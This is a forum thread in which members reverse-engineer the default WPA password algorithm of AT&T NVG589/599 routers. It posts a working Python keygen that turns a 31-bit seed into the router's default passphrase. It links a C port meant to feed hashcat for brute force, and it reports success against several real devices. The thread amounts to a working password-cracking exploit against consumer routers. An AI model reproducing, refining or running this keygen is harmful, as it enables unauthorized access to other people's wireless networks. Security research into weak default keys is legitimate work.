Keyspace List for WPA on Default Routers soxrok2212 Member Posts: 182 Threads: 4 Joined: Jul 2015 07-07-2017, 01:29 AM (This post was last modified: 07-07-2017, 01:30 AM by soxrok2212.) (07-06-2017, 10:50 PM)fart-box Wrote: I agree about the 'l'. It seems to be too seldom used. I've been trying to convert those magic numbers your code generates into some form of seed to build a proper pass phrase but I've had no luck. I wonder how soxrok2212 is doing with his firmware extraction...? I got caught up in work, sorry. Was also trying to figure out which of the two possible points of interest may be UART but I ran out of time, don't have a day off until next week but I'll try to figure it out in any spare time mrfancypants Junior Member Posts: 37 Threads: 3 Joined: Apr 2017 07-09-2017, 10:40 AM (This post was last modified: 07-09-2017, 10:44 AM by mrfancypants.) Alpha version of the keygen for NVG589: Code:pw_charset='abcdefghijkmnpqrstuvwxyz23456789#%+=?' def pwgen589(x):   x=int(x*465661287.5245797)   pw=''   for n in range(0,6):    pw=pw_charset[x%37] + pw    x/=37    pw=chr(50+(x%8)) + pw    x/=37   return pw Example:   589.jpg (Size: 52.29 KB / Downloads: 45)   Code:>>> pwgen589(0x57c5d9ab) '596p7=6y6r2a' As before, 'x' is integer 0 to 0x7FFFFFFF (2 billion options). I'm not yet clear how (or if) 'x' relates to other device attributes. This only works about 70% of the time because of the rounding during the float multiplication step. The magic number is approximately equal to 1e18/2^31 + 111/2^9 + 2923/2^25 (not certain about the last term.) Depending on the order of operations, sometimes the result ends up slightly off. soxrok2212 Member Posts: 182 Threads: 4 Joined: Jul 2015 07-09-2017, 09:33 PM (07-09-2017, 10:40 AM)mrfancypants Wrote: Alpha version of the keygen for NVG589: Code:pw_charset='abcdefghijkmnpqrstuvwxyz23456789#%+=?' def pwgen589(x):   x=int(x*465661287.5245797)   pw=''   for n in range(0,6):    pw=pw_charset[x%37] + pw    x/=37    pw=chr(50+(x%8)) + pw    x/=37   return pw Example:   Code:>>> pwgen589(0x57c5d9ab) '596p7=6y6r2a' As before, 'x' is integer 0 to 0x7FFFFFFF (2 billion options). I'm not yet clear how (or if) 'x' relates to other device attributes. This only works about 70% of the time because of the rounding during the float multiplication step. The magic number is approximately equal to 1e18/2^31 + 111/2^9 + 2923/2^25 (not certain about the last term.) Depending on the order of operations, sometimes the result ends up slightly off. I will modify this code a bit and see if a friend of mine can use his 2.6MH/s and see if it works on my 589. mrfancypants Junior Member Posts: 37 Threads: 3 Joined: Apr 2017 07-10-2017, 12:07 AM Give me the first 8 letters of the key from your 589. soxrok2212 Member Posts: 182 Threads: 4 Joined: Jul 2015 07-10-2017, 02:15 AM b=+#gc5q mrfancypants Junior Member Posts: 37 Threads: 3 Joined: Apr 2017 07-10-2017, 02:37 AM (This post was last modified: 07-10-2017, 02:59 AM by mrfancypants.) That's a 599-type password (my previous code snippet) (some 589s have these) and the complete password should be b=+#gc5qr9gt https://repl.it/JMbi/4 soxrok2212 Member Posts: 182 Threads: 4 Joined: Jul 2015 07-10-2017, 11:36 AM (This post was last modified: 07-10-2017, 04:22 PM by soxrok2212.) (07-10-2017, 02:37 AM)mrfancypants Wrote: That's a 599-type password (my previous code snippet) (some 589s have these) and the complete password should be b=+#gc5qr9gt https://repl.it/JMbi/4 You are correct sir! Fantastic work! I know absolutely no C but from my understanding, if there are only 2.1 billion possibilities, then a full bruteforce is possible. I know a few people who could help me write this in C in order to pipe faster, but it may take some time. soxrok2212 Member Posts: 182 Threads: 4 Joined: Jul 2015 07-11-2017, 05:38 PM I have written the NVG589 code in C with help from a friend. I have not tested performance with hashcat yet, but you should be able to pipe directly in. https://github.com/soxrok2212/PSKracker/...ster/att.c devilsadvocate Member Posts: 97 Threads: 32 Joined: Aug 2014 07-12-2017, 02:52 AM Initial tests are interesting.  Between a combination of some pictures I had archived of NVG589's and some listings that can be seen on ebay, I tested a total of 7 devices. In every case, I could see what the default wifi password was in a picture of the back of the unit. Of the 7 I tested the results were the following: 4 - password correctly calculated 2 - password almost correctly calculated 1 - not even close Regarding the 2 that were almost correctly calculated, the passphrase with the exception of the last 2 characters were guessed correctly, but the last 2 characters were wrong.  A workaround is to come up with a rule that can truncate the last 2 characters and brute force positions 11 and 12.  Either that or adjust the code as necessary. But this is remarkable.  Good work. Cheers. soxrok2212 Member Posts: 182 Threads: 4 Joined: Jul 2015 07-12-2017, 03:54 AM Did you test the python or C code? « Next Oldest | Next Newest »